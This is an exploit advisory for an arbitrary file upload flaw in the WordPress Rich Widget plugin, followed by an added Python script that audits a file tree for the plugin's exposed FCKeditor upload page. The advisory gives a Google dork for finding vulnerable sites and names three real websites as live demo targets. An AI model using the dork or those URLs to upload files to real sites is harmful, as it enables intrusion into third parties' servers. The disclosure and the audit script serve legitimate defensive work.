The WordPress Rich Widget third-party plugin suffers from an arbitrary file upload vulnerability.
38935038ab3d5c40c39b162fc8ad9477c1346f6d1276d6494ee3bb8f7896074e
# Exploit Title: WordPress Rich Widget Arbitrary File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/rich-widget
# Date: 08/22/2012
# Author: Crim3R
# Download Link: http://downloads.wordpress.org/plugin/rich-widget.0.2.4.zip
# Tested on: all
==================================
D3m0:
http://robinveilleux.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
http://www.ctexpos.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
http://www.krystalclear.ca/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
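
A defender-side check for the exposure described above, as an added example that is not part of the original advisory: it walks a directory tree for installs of the rich-widget plugin and reports whether the bundled FCKeditor connectors directory and its test.html page are still on disk. The function names, the constructed sample tree and the main plugin file name `rich-widget.php` are assumptions.

```python
import os, re, tempfile

# Paths from the advisory's demo URLs, relative to a WordPress document root.
PLUGIN_REL = os.path.join("wp-content", "plugins", "rich-widget")
CONNECTORS_REL = os.path.join("fckeditor", "editor", "filemanager", "connectors")
VERSION_RE = re.compile(r"^[ \t/*#]*Version:\s*(\S+)", re.I | re.M)

def plugin_version(plugin_dir):
    """Read the WordPress 'Version:' header from the plugin's top-level PHP files."""
    for name in sorted(os.listdir(plugin_dir)):
        path = os.path.join(plugin_dir, name)
        if name.endswith(".php") and os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                match = VERSION_RE.search(fh.read(8192))
            if match:
                return match.group(1)
    return None

def audit(search_root):
    """Return one finding per rich-widget install found under search_root."""
    findings = []
    for dirpath, dirnames, _files in os.walk(search_root):
        if not dirpath.endswith(os.sep + PLUGIN_REL):
            continue
        dirnames[:] = []  # plugin found; no need to descend into it
        connectors = os.path.join(dirpath, CONNECTORS_REL)
        findings.append({
            "plugin_dir": dirpath,
            "version": plugin_version(dirpath),
            "connectors_present": os.path.isdir(connectors),
            "test_page_present": os.path.isfile(os.path.join(connectors, "test.html")),
        })
    return sorted(findings, key=lambda f: f["plugin_dir"])

def demo():
    """Audit a constructed tree: site-a ships the connectors, site-b had them removed."""
    with tempfile.TemporaryDirectory() as root:
        for site, with_connectors in (("site-a", True), ("site-b", False)):
            plugin = os.path.join(root, site, PLUGIN_REL)
            os.makedirs(plugin)
            # Constructed header file; the real main file name is an assumption.
            with open(os.path.join(plugin, "rich-widget.php"), "w") as fh:
                fh.write("<?php\n/*\nPlugin Name: Rich Widget\nVersion: 0.2.4\n*/\n")
            if with_connectors:
                conn = os.path.join(plugin, CONNECTORS_REL)
                os.makedirs(conn)
                open(os.path.join(conn, "test.html"), "w").close()
        return [(os.path.relpath(f["plugin_dir"], root).split(os.sep)[0], f["version"],
                 f["connectors_present"], f["test_page_present"]) for f in audit(root)]
```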